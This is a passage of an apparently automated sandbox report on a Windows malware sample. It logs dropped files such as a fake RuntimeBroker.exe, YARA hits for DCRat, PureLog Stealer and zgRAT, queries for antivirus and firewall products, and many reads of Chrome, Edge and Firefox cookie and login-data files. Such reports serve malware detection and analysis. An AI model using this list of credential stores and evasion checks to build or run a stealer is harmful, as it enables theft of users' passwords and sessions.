                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeQueries volume information: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe VolumeInformation
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 0.2.s5duotgoYD.exe.131da5f8.6.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1812029430.0000000013178000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: s5duotgoYD.exe PID: 7416, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 8240, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: s5duotgoYD.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.s5duotgoYD.exe.b80000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1674094332.0000000000B82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\xKVBpkhCEjg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\ModemLogs\conhost.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: s5duotgoYD.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.s5duotgoYD.exe.b80000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\xKVBpkhCEjg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\ModemLogs\conhost.exe, type: DROPPED
                              Tries to harvest and steal browser information (history, passwords, etc)
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Recovery\RuntimeBroker.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
